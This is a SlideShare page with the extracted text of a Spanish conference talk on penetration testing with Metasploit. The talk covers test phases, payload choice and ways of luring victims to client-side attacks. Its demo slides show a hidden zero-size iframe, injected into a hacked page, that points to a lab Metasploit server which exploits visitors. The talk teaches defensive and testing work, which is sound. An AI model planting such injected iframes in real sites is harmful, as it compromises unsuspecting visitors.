SlideShare una empresa de Scribd logo
Pe n t e s t i n g c o n
  Me t a s p l o i t
   F r a me w o r k
        Pablo González
¿Qué e s
Me t a s p l o i t ?
Es e l c a o s , p u r o
    y b e l l o p o r
f u e r a , e t e r n o y
  c o mp l e j o p o r
d e n t r o , e s p u r o
  p e n t e s t i n g …
Ag e n d a
1. A r q u i t e c t u r a d e
   Me t a s p l o i t
2. Fases de un test de intrusión
3. ¿Dónde p a r t i c i p a
   Me t a s p l o i t ?
4. El arte de la intrusión
5. El bien y el mal…
6. D e m o
7. L a t i e n d a e n c a s a
Ar q u i t
e c t u r a ?
Fases Test Intrusión
Fa s e s
Alcance y términos del test de intrusión
Recolección de información
Análisis                               d e
 v u l n e r a b i l i d a d e s
Explotación                            d e
 v u l n e r a b i l i d a d e s
Post-Explotación d e l s i s t e m a
Generación d e i n f o r m e s
¿Dónde
p a r t i c i p a ?
Lo importante es…
P a r t i c i p a r !!!

Recolección de información
Análisis d e
 v u l n e r a b i l i d a d e s
Explotación d e
 v u l n e r a b i l i d a d e s
Post-Explotación

Pero incluso… a y u d a a
El arte de la intrusión
¿Arte o Ingeniería?
 Pr o c e d u r    e
 p e n t e s t i   n g ;
 B E GI N
      wr i t e     l n („p a s o 1‟)
      wr i t e     l n („p a s o 2‟)
      …
      a r t e ;
 END;

 Pr o c e d u r e a r t e ;
 …
Ámbito
Explotación vulnerabilidades (pero…)

B e s t a n d Wo r s t
Pr a c t i c e s
Elección d e l
         p a y l o a d
Más d e 200 p a y l o a d s …

Son     nuestras  cartas…    ¿Siempre
u s a r e mo s a l r e y ?
Tipos de Intrusión
¿Cómo l a n z o l o s
e x p l o i t s ?

  Sin Interacción… (t e r r o r !)
  Con Interacción… (c l i e n t -s i d e
   a t t a c k !)
Cl i e n t Si d e
        At t a c k !
D a r k S h a d o w s , ¿Cómo hago para
que hagan peticiones a mí?

M a i l i n g    ? (s p a m ? ? )
 Foros…
 Páginas w e b   h a c k e a d a s …
P u b l i c a    c i o n e s           e n
  I n t e r n e   t
A c o r t a d    o r e s …
A t a q u e s       l o c a l e s   (D N S
  Sp o o f )
El bien y el mal…
El límite
Debemos ser éticos… ¿Lo s o m o s ?

La delgada línea…

P   o   d   e   mo s u t i l i z a r    l o s
a   t   a   q   u e s    c l i e n t -s i d e
p   a   r   a   : (m u c h a s , m u c h a s
c   o   s   a   s )
    Distribución malware…
    P a y l o a d s      p e r ma n e n t e s
D e mo : A
j u g a r !
¿Qué v a m o s a
          h a c e r ?
Escenario: (idea del mundo real… ^ ^ )

1. Página h a c k e a d a …
2. I f r a m e q u e a p u n t e a 1
   s e r v e r c o n MS F
3. L a n z a m i e n t o d e
   e x p l o i t s c o n t r a
   c l i e n t e
4. Obtenemos el control…
I f r a me …
<i f r a m e
s r c =h t t p ://192.168.56.101:8080
/ w i d t h =0 h e i g h t =0
s t y l e =“h i d d e n ”
f r a m e b o r d e r =0
m a r g i n h e i g h t =0
m a r g i n w i d t h =0/>
L a t i e n d a
  e n c a s a
He tenido el honor…
…y han tenido la paciencia…

Me t a s p l o i t p a r a
Pe n t e s t e r s
Pentesting con metasploit framework

Más contenido relacionado

Similar a Pentesting con metasploit framework

Introducción a la criptografía
Introducción a la criptografíaIntroducción a la criptografía
Introducción a la criptografía
poloklas
 
Los Mitchell (2).pptx
Los Mitchell (2).pptxLos Mitchell (2).pptx
Los Mitchell (2).pptx
MikaWolfy555
 
Introduccion a la_f_ilosofia
Introduccion a la_f_ilosofiaIntroduccion a la_f_ilosofia
Introduccion a la_f_ilosofiabryanal7
 
Si la IA aprende, tú tienes que hacerlo mejor.
Si la IA aprende, tú tienes que hacerlo mejor. Si la IA aprende, tú tienes que hacerlo mejor.
Si la IA aprende, tú tienes que hacerlo mejor.
Kenia Salado
 
5 raz. matem.
5 raz. matem.5 raz. matem.
5 raz. matem.
favio Quevedo Jurado
 
Revista - Riesgo y Seguridad en los Computadores
Revista - Riesgo y Seguridad en los ComputadoresRevista - Riesgo y Seguridad en los Computadores
Revista - Riesgo y Seguridad en los Computadores
LauraLan5
 
El mundo de las figuras imposibles
El mundo de las figuras imposiblesEl mundo de las figuras imposibles
El mundo de las figuras imposibleshvergaratic
 
Dichos e ideas sobre la Inteligencia Artificial II
Dichos e ideas sobre la Inteligencia Artificial IIDichos e ideas sobre la Inteligencia Artificial II
Dichos e ideas sobre la Inteligencia Artificial II
Kenia Salado
 
ExposicióN
ExposicióNExposicióN
ExposicióNudabol
 
Presentación
PresentaciónPresentación
Presentación
Luisangelucramirez
 
Pres capacitacionclaro arg_final
Pres capacitacionclaro arg_finalPres capacitacionclaro arg_final
Pres capacitacionclaro arg_finaldlbgroupweb
 
Estudio De Mercado
Estudio De MercadoEstudio De Mercado
Estudio De Mercadoaerazov
 
Web Quest Del Riachuelo2
Web Quest Del Riachuelo2Web Quest Del Riachuelo2
Web Quest Del Riachuelo2amidalax
 
Lep1 b act06 parga tania seguridad web
Lep1 b act06 parga tania seguridad webLep1 b act06 parga tania seguridad web
Lep1 b act06 parga tania seguridad web
Tania Cabrales
 
Caso de éxito de The Grove
Caso de éxito de The GroveCaso de éxito de The Grove
Caso de éxito de The Grove
Fundació Bit
 
Semiologia sistema circulatorio
Semiologia sistema circulatorioSemiologia sistema circulatorio
Semiologia sistema circulatorioLuis Fernando
 

Similar a Pentesting con metasploit framework (20)

Introducción a la criptografía
Introducción a la criptografíaIntroducción a la criptografía
Introducción a la criptografía
 
Los Mitchell (2).pptx
Los Mitchell (2).pptxLos Mitchell (2).pptx
Los Mitchell (2).pptx
 
Introduccion a la_f_ilosofia
Introduccion a la_f_ilosofiaIntroduccion a la_f_ilosofia
Introduccion a la_f_ilosofia
 
Si la IA aprende, tú tienes que hacerlo mejor.
Si la IA aprende, tú tienes que hacerlo mejor. Si la IA aprende, tú tienes que hacerlo mejor.
Si la IA aprende, tú tienes que hacerlo mejor.
 
THE POWER OF LIVE H2O
THE POWER OF LIVE H2OTHE POWER OF LIVE H2O
THE POWER OF LIVE H2O
 
Power Of Live
Power Of LivePower Of Live
Power Of Live
 
5 raz. matem.
5 raz. matem.5 raz. matem.
5 raz. matem.
 
Revista - Riesgo y Seguridad en los Computadores
Revista - Riesgo y Seguridad en los ComputadoresRevista - Riesgo y Seguridad en los Computadores
Revista - Riesgo y Seguridad en los Computadores
 
Aprendizaje en linea
Aprendizaje en lineaAprendizaje en linea
Aprendizaje en linea
 
El mundo de las figuras imposibles
El mundo de las figuras imposiblesEl mundo de las figuras imposibles
El mundo de las figuras imposibles
 
Aprendizaje en linea
Aprendizaje en lineaAprendizaje en linea
Aprendizaje en linea
 
Dichos e ideas sobre la Inteligencia Artificial II
Dichos e ideas sobre la Inteligencia Artificial IIDichos e ideas sobre la Inteligencia Artificial II
Dichos e ideas sobre la Inteligencia Artificial II
 
ExposicióN
ExposicióNExposicióN
ExposicióN
 
Presentación
PresentaciónPresentación
Presentación
 
Pres capacitacionclaro arg_final
Pres capacitacionclaro arg_finalPres capacitacionclaro arg_final
Pres capacitacionclaro arg_final
 
Estudio De Mercado
Estudio De MercadoEstudio De Mercado
Estudio De Mercado
 
Web Quest Del Riachuelo2
Web Quest Del Riachuelo2Web Quest Del Riachuelo2
Web Quest Del Riachuelo2
 
Lep1 b act06 parga tania seguridad web
Lep1 b act06 parga tania seguridad webLep1 b act06 parga tania seguridad web
Lep1 b act06 parga tania seguridad web
 
Caso de éxito de The Grove
Caso de éxito de The GroveCaso de éxito de The Grove
Caso de éxito de The Grove
 
Semiologia sistema circulatorio
Semiologia sistema circulatorioSemiologia sistema circulatorio
Semiologia sistema circulatorio
 

Más de Eventos Creativos

La informática se creó en las calles: Microhistorias de Apple y Microsoft
La informática se creó en las calles: Microhistorias de Apple y MicrosoftLa informática se creó en las calles: Microhistorias de Apple y Microsoft
La informática se creó en las calles: Microhistorias de Apple y Microsoft
Eventos Creativos
 
Windows server 2012 para it
Windows server 2012 para itWindows server 2012 para it
Windows server 2012 para it
Eventos Creativos
 
Malware en android
Malware en androidMalware en android
Malware en android
Eventos Creativos
 
Atacando iphone a través de wireless y javascript botnet
Atacando iphone a través de wireless y javascript botnetAtacando iphone a través de wireless y javascript botnet
Atacando iphone a través de wireless y javascript botnet
Eventos Creativos
 
Ataque a redes de datos IPv6 con Evil Foca
Ataque a redes de datos IPv6 con Evil FocaAtaque a redes de datos IPv6 con Evil Foca
Ataque a redes de datos IPv6 con Evil Foca
Eventos Creativos
 
Windows 8
Windows 8Windows 8
Análisis forense de dispositivos android 03
Análisis forense de dispositivos android 03Análisis forense de dispositivos android 03
Análisis forense de dispositivos android 03Eventos Creativos
 
Análisis forense de dispositivos android 02
Análisis forense de dispositivos android 02Análisis forense de dispositivos android 02
Análisis forense de dispositivos android 02
Eventos Creativos
 
Análisis forense de dispositivos android 01
Análisis forense de dispositivos android 01Análisis forense de dispositivos android 01
Análisis forense de dispositivos android 01
Eventos Creativos
 
Análisis forense de dispositivos ios
Análisis forense de dispositivos iosAnálisis forense de dispositivos ios
Análisis forense de dispositivos ios
Eventos Creativos
 
Arquitectura, aplicaciones y seguridad en ios
Arquitectura, aplicaciones y seguridad en iosArquitectura, aplicaciones y seguridad en ios
Arquitectura, aplicaciones y seguridad en ios
Eventos Creativos
 
Jailbreak y rooting más allá de los límites del dispositivo
Jailbreak y rooting más allá de los límites del dispositivoJailbreak y rooting más allá de los límites del dispositivo
Jailbreak y rooting más allá de los límites del dispositivo
Eventos Creativos
 
I os en el entorno corporativo
I os en el entorno corporativoI os en el entorno corporativo
I os en el entorno corporativo
Eventos Creativos
 
Análisis forense de tarjetas sim, smartcards, etc
Análisis forense de tarjetas sim, smartcards, etcAnálisis forense de tarjetas sim, smartcards, etc
Análisis forense de tarjetas sim, smartcards, etc
Eventos Creativos
 
Lo que las apps esconden
Lo que las apps escondenLo que las apps esconden
Lo que las apps esconden
Eventos Creativos
 
Firma digital y biométrica en dispositivos móviles
Firma digital y biométrica en dispositivos móvilesFirma digital y biométrica en dispositivos móviles
Firma digital y biométrica en dispositivos móviles
Eventos Creativos
 
Nfc en móviles
Nfc en móvilesNfc en móviles
Nfc en móviles
Eventos Creativos
 
Fraude en tecnológias móviles
Fraude en tecnológias móvilesFraude en tecnológias móviles
Fraude en tecnológias móviles
Eventos Creativos
 
Malware en dispositivos móviles
Malware en dispositivos móvilesMalware en dispositivos móviles
Malware en dispositivos móviles
Eventos Creativos
 
Análisis forense con oxygen forensics suite 2012 analyst
Análisis forense con oxygen forensics suite 2012 analystAnálisis forense con oxygen forensics suite 2012 analyst
Análisis forense con oxygen forensics suite 2012 analyst
Eventos Creativos
 

Más de Eventos Creativos (20)

La informática se creó en las calles: Microhistorias de Apple y Microsoft
La informática se creó en las calles: Microhistorias de Apple y MicrosoftLa informática se creó en las calles: Microhistorias de Apple y Microsoft
La informática se creó en las calles: Microhistorias de Apple y Microsoft
 
Windows server 2012 para it
Windows server 2012 para itWindows server 2012 para it
Windows server 2012 para it
 
Malware en android
Malware en androidMalware en android
Malware en android
 
Atacando iphone a través de wireless y javascript botnet
Atacando iphone a través de wireless y javascript botnetAtacando iphone a través de wireless y javascript botnet
Atacando iphone a través de wireless y javascript botnet
 
Ataque a redes de datos IPv6 con Evil Foca
Ataque a redes de datos IPv6 con Evil FocaAtaque a redes de datos IPv6 con Evil Foca
Ataque a redes de datos IPv6 con Evil Foca
 
Windows 8
Windows 8Windows 8
Windows 8
 
Análisis forense de dispositivos android 03
Análisis forense de dispositivos android 03Análisis forense de dispositivos android 03
Análisis forense de dispositivos android 03
 
Análisis forense de dispositivos android 02
Análisis forense de dispositivos android 02Análisis forense de dispositivos android 02
Análisis forense de dispositivos android 02
 
Análisis forense de dispositivos android 01
Análisis forense de dispositivos android 01Análisis forense de dispositivos android 01
Análisis forense de dispositivos android 01
 
Análisis forense de dispositivos ios
Análisis forense de dispositivos iosAnálisis forense de dispositivos ios
Análisis forense de dispositivos ios
 
Arquitectura, aplicaciones y seguridad en ios
Arquitectura, aplicaciones y seguridad en iosArquitectura, aplicaciones y seguridad en ios
Arquitectura, aplicaciones y seguridad en ios
 
Jailbreak y rooting más allá de los límites del dispositivo
Jailbreak y rooting más allá de los límites del dispositivoJailbreak y rooting más allá de los límites del dispositivo
Jailbreak y rooting más allá de los límites del dispositivo
 
I os en el entorno corporativo
I os en el entorno corporativoI os en el entorno corporativo
I os en el entorno corporativo
 
Análisis forense de tarjetas sim, smartcards, etc
Análisis forense de tarjetas sim, smartcards, etcAnálisis forense de tarjetas sim, smartcards, etc
Análisis forense de tarjetas sim, smartcards, etc
 
Lo que las apps esconden
Lo que las apps escondenLo que las apps esconden
Lo que las apps esconden
 
Firma digital y biométrica en dispositivos móviles
Firma digital y biométrica en dispositivos móvilesFirma digital y biométrica en dispositivos móviles
Firma digital y biométrica en dispositivos móviles
 
Nfc en móviles
Nfc en móvilesNfc en móviles
Nfc en móviles
 
Fraude en tecnológias móviles
Fraude en tecnológias móvilesFraude en tecnológias móviles
Fraude en tecnológias móviles
 
Malware en dispositivos móviles
Malware en dispositivos móvilesMalware en dispositivos móviles
Malware en dispositivos móviles
 
Análisis forense con oxygen forensics suite 2012 analyst
Análisis forense con oxygen forensics suite 2012 analystAnálisis forense con oxygen forensics suite 2012 analyst
Análisis forense con oxygen forensics suite 2012 analyst
 

Último

Robótica educativa para la eduacion primaria .pptx
Robótica educativa para la eduacion primaria .pptxRobótica educativa para la eduacion primaria .pptx
Robótica educativa para la eduacion primaria .pptx
44652726
 
Estructuras Básicas_Tecnología_Grado10-7.pdf
Estructuras Básicas_Tecnología_Grado10-7.pdfEstructuras Básicas_Tecnología_Grado10-7.pdf
Estructuras Básicas_Tecnología_Grado10-7.pdf
cristianrb0324
 
Estructuras básicas_ conceptos de programación (1).docx
Estructuras básicas_ conceptos de programación  (1).docxEstructuras básicas_ conceptos de programación  (1).docx
Estructuras básicas_ conceptos de programación (1).docx
SamuelRamirez83524
 
proyecto invernadero desde el departamento de tecnología para Erasmus
proyecto invernadero desde el departamento de tecnología para Erasmusproyecto invernadero desde el departamento de tecnología para Erasmus
proyecto invernadero desde el departamento de tecnología para Erasmus
raquelariza02
 
Diagrama de flujo basada en la reparacion de automoviles.pdf
Diagrama de flujo basada en la reparacion de automoviles.pdfDiagrama de flujo basada en la reparacion de automoviles.pdf
Diagrama de flujo basada en la reparacion de automoviles.pdf
ManuelCampos464987
 
Conceptos Básicos de Programación Proyecto
Conceptos Básicos de Programación ProyectoConceptos Básicos de Programación Proyecto
Conceptos Básicos de Programación Proyecto
cofferub
 
Inteligencia Artificial y Ciberseguridad.pdf
Inteligencia Artificial y Ciberseguridad.pdfInteligencia Artificial y Ciberseguridad.pdf
Inteligencia Artificial y Ciberseguridad.pdf
Emilio Casbas
 
Estructuras Básicas_ Conceptos Basicos De Programacion.pdf
Estructuras Básicas_ Conceptos Basicos De Programacion.pdfEstructuras Básicas_ Conceptos Basicos De Programacion.pdf
Estructuras Básicas_ Conceptos Basicos De Programacion.pdf
IsabellaRubio6
 
TRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
TRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdfTRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
TRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
thomasdcroz38
 
trabajo de tecnologia, segundo periodo 9-6f
trabajo de tecnologia, segundo periodo 9-6ftrabajo de tecnologia, segundo periodo 9-6f
trabajo de tecnologia, segundo periodo 9-6f
zoecaicedosalazar
 
Diagrama de flujo soporte técnico 5to semestre
Diagrama de flujo soporte técnico 5to semestreDiagrama de flujo soporte técnico 5to semestre
Diagrama de flujo soporte técnico 5to semestre
rafaelsalazar0615
 
(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informática
(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informática(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informática
(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informática
vazquezgarciajesusma
 
EduFlex, una educación accesible para quienes no entienden en clases
EduFlex, una educación accesible para quienes no entienden en clasesEduFlex, una educación accesible para quienes no entienden en clases
EduFlex, una educación accesible para quienes no entienden en clases
PABLOCESARGARZONBENI
 
Conceptos Básicos de Programación L.D 10-5
Conceptos Básicos de Programación L.D 10-5Conceptos Básicos de Programación L.D 10-5
Conceptos Básicos de Programación L.D 10-5
JulyMuoz18
 
Desarrollo de Habilidades de Pensamiento.
Desarrollo de Habilidades de Pensamiento.Desarrollo de Habilidades de Pensamiento.
Desarrollo de Habilidades de Pensamiento.
AlejandraCasallas7
 
ACTIVIDAD DE TECNOLOGÍA AÑO LECTIVO 2024
ACTIVIDAD DE TECNOLOGÍA AÑO LECTIVO 2024ACTIVIDAD DE TECNOLOGÍA AÑO LECTIVO 2024
ACTIVIDAD DE TECNOLOGÍA AÑO LECTIVO 2024
DanielErazoMedina
 
leidy fuentes - power point -expocccion -unidad 4 (1).pptx
leidy fuentes - power point -expocccion -unidad 4 (1).pptxleidy fuentes - power point -expocccion -unidad 4 (1).pptx
leidy fuentes - power point -expocccion -unidad 4 (1).pptx
Leidyfuentes19
 
DESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
DESARROLO DE HABILIDADES DE PENSAMIENTO.pdfDESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
DESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
marianabz2403
 
Conceptos Básicos de Programación. Tecnología
Conceptos Básicos de Programación. TecnologíaConceptos Básicos de Programación. Tecnología
Conceptos Básicos de Programación. Tecnología
coloradxmaria
 
Trabajo Coding For kids 1 y 2 grado 9-4.pdf
Trabajo Coding For kids 1 y 2 grado 9-4.pdfTrabajo Coding For kids 1 y 2 grado 9-4.pdf
Trabajo Coding For kids 1 y 2 grado 9-4.pdf
jjfch3110
 

Último (20)

Robótica educativa para la eduacion primaria .pptx
Robótica educativa para la eduacion primaria .pptxRobótica educativa para la eduacion primaria .pptx
Robótica educativa para la eduacion primaria .pptx
 
Estructuras Básicas_Tecnología_Grado10-7.pdf
Estructuras Básicas_Tecnología_Grado10-7.pdfEstructuras Básicas_Tecnología_Grado10-7.pdf
Estructuras Básicas_Tecnología_Grado10-7.pdf
 
Estructuras básicas_ conceptos de programación (1).docx
Estructuras básicas_ conceptos de programación  (1).docxEstructuras básicas_ conceptos de programación  (1).docx
Estructuras básicas_ conceptos de programación (1).docx
 
proyecto invernadero desde el departamento de tecnología para Erasmus
proyecto invernadero desde el departamento de tecnología para Erasmusproyecto invernadero desde el departamento de tecnología para Erasmus
proyecto invernadero desde el departamento de tecnología para Erasmus
 
Diagrama de flujo basada en la reparacion de automoviles.pdf
Diagrama de flujo basada en la reparacion de automoviles.pdfDiagrama de flujo basada en la reparacion de automoviles.pdf
Diagrama de flujo basada en la reparacion de automoviles.pdf
 
Conceptos Básicos de Programación Proyecto
Conceptos Básicos de Programación ProyectoConceptos Básicos de Programación Proyecto
Conceptos Básicos de Programación Proyecto
 
Inteligencia Artificial y Ciberseguridad.pdf
Inteligencia Artificial y Ciberseguridad.pdfInteligencia Artificial y Ciberseguridad.pdf
Inteligencia Artificial y Ciberseguridad.pdf
 
Estructuras Básicas_ Conceptos Basicos De Programacion.pdf
Estructuras Básicas_ Conceptos Basicos De Programacion.pdfEstructuras Básicas_ Conceptos Basicos De Programacion.pdf
Estructuras Básicas_ Conceptos Basicos De Programacion.pdf
 
TRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
TRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdfTRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
TRABAJO DESARROLLO DE HABILIDADES DE PENSAMIENTO.pdf
 
trabajo de tecnologia, segundo periodo 9-6f
trabajo de tecnologia, segundo periodo 9-6ftrabajo de tecnologia, segundo periodo 9-6f
trabajo de tecnologia, segundo periodo 9-6f
 
Diagrama de flujo soporte técnico 5to semestre
Diagrama de flujo soporte técnico 5to semestreDiagrama de flujo soporte técnico 5to semestre
Diagrama de flujo soporte técnico 5to semestre
 
(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informática
(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informática(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informática
(PROYECTO) Límites entre el Arte, los Medios de Comunicación y la Informática
 
EduFlex, una educación accesible para quienes no entienden en clases
EduFlex, una educación accesible para quienes no entienden en clasesEduFlex, una educación accesible para quienes no entienden en clases
EduFlex, una educación accesible para quienes no entienden en clases
 
Conceptos Básicos de Programación L.D 10-5
Conceptos Básicos de Programación L.D 10-5Conceptos Básicos de Programación L.D 10-5
Conceptos Básicos de Programación L.D 10-5
 
Desarrollo de Habilidades de Pensamiento.
Desarrollo de Habilidades de Pensamiento.Desarrollo de Habilidades de Pensamiento.
Desarrollo de Habilidades de Pensamiento.
 
ACTIVIDAD DE TECNOLOGÍA AÑO LECTIVO 2024
ACTIVIDAD DE TECNOLOGÍA AÑO LECTIVO 2024ACTIVIDAD DE TECNOLOGÍA AÑO LECTIVO 2024
ACTIVIDAD DE TECNOLOGÍA AÑO LECTIVO 2024
 
leidy fuentes - power point -expocccion -unidad 4 (1).pptx
leidy fuentes - power point -expocccion -unidad 4 (1).pptxleidy fuentes - power point -expocccion -unidad 4 (1).pptx
leidy fuentes - power point -expocccion -unidad 4 (1).pptx
 
DESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
DESARROLO DE HABILIDADES DE PENSAMIENTO.pdfDESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
DESARROLO DE HABILIDADES DE PENSAMIENTO.pdf
 
Conceptos Básicos de Programación. Tecnología
Conceptos Básicos de Programación. TecnologíaConceptos Básicos de Programación. Tecnología
Conceptos Básicos de Programación. Tecnología
 
Trabajo Coding For kids 1 y 2 grado 9-4.pdf
Trabajo Coding For kids 1 y 2 grado 9-4.pdfTrabajo Coding For kids 1 y 2 grado 9-4.pdf
Trabajo Coding For kids 1 y 2 grado 9-4.pdf
 

Pentesting con metasploit framework

  • 1. Pe n t e s t i n g c o n Me t a s p l o i t F r a me w o r k Pablo González
  • 2. ¿Qué e s Me t a s p l o i t ? Es e l c a o s , p u r o y b e l l o p o r f u e r a , e t e r n o y c o mp l e j o p o r d e n t r o , e s p u r o p e n t e s t i n g …
  • 3. Ag e n d a 1. A r q u i t e c t u r a d e Me t a s p l o i t 2. Fases de un test de intrusión 3. ¿Dónde p a r t i c i p a Me t a s p l o i t ? 4. El arte de la intrusión 5. El bien y el mal… 6. D e m o 7. L a t i e n d a e n c a s a
  • 4. Ar q u i t e c t u r a ?
  • 5.
  • 7. Fa s e s Alcance y términos del test de intrusión Recolección de información Análisis d e v u l n e r a b i l i d a d e s Explotación d e v u l n e r a b i l i d a d e s Post-Explotación d e l s i s t e m a Generación d e i n f o r m e s
  • 8. ¿Dónde p a r t i c i p a ?
  • 9. Lo importante es… P a r t i c i p a r !!! Recolección de información Análisis d e v u l n e r a b i l i d a d e s Explotación d e v u l n e r a b i l i d a d e s Post-Explotación Pero incluso… a y u d a a
  • 10. El arte de la intrusión
  • 11. ¿Arte o Ingeniería? Pr o c e d u r e p e n t e s t i n g ; B E GI N wr i t e l n („p a s o 1‟) wr i t e l n („p a s o 2‟) … a r t e ; END; Pr o c e d u r e a r t e ; …
  • 12. Ámbito Explotación vulnerabilidades (pero…) B e s t a n d Wo r s t Pr a c t i c e s
  • 13. Elección d e l p a y l o a d Más d e 200 p a y l o a d s … Son nuestras cartas… ¿Siempre u s a r e mo s a l r e y ?
  • 14. Tipos de Intrusión ¿Cómo l a n z o l o s e x p l o i t s ? Sin Interacción… (t e r r o r !) Con Interacción… (c l i e n t -s i d e a t t a c k !)
  • 15. Cl i e n t Si d e At t a c k ! D a r k S h a d o w s , ¿Cómo hago para que hagan peticiones a mí? M a i l i n g ? (s p a m ? ? )  Foros…  Páginas w e b h a c k e a d a s … P u b l i c a c i o n e s e n I n t e r n e t A c o r t a d o r e s … A t a q u e s l o c a l e s (D N S Sp o o f )
  • 16. El bien y el mal…
  • 17. El límite Debemos ser éticos… ¿Lo s o m o s ? La delgada línea… P o d e mo s u t i l i z a r l o s a t a q u e s c l i e n t -s i d e p a r a : (m u c h a s , m u c h a s c o s a s ) Distribución malware… P a y l o a d s p e r ma n e n t e s
  • 18. D e mo : A j u g a r !
  • 19. ¿Qué v a m o s a h a c e r ? Escenario: (idea del mundo real… ^ ^ ) 1. Página h a c k e a d a … 2. I f r a m e q u e a p u n t e a 1 s e r v e r c o n MS F 3. L a n z a m i e n t o d e e x p l o i t s c o n t r a c l i e n t e 4. Obtenemos el control…
  • 20. I f r a me … <i f r a m e s r c =h t t p ://192.168.56.101:8080 / w i d t h =0 h e i g h t =0 s t y l e =“h i d d e n ” f r a m e b o r d e r =0 m a r g i n h e i g h t =0 m a r g i n w i d t h =0/>
  • 21.
  • 22.
  • 23. L a t i e n d a e n c a s a
  • 24. He tenido el honor… …y han tenido la paciencia… Me t a s p l o i t p a r a Pe n t e s t e r s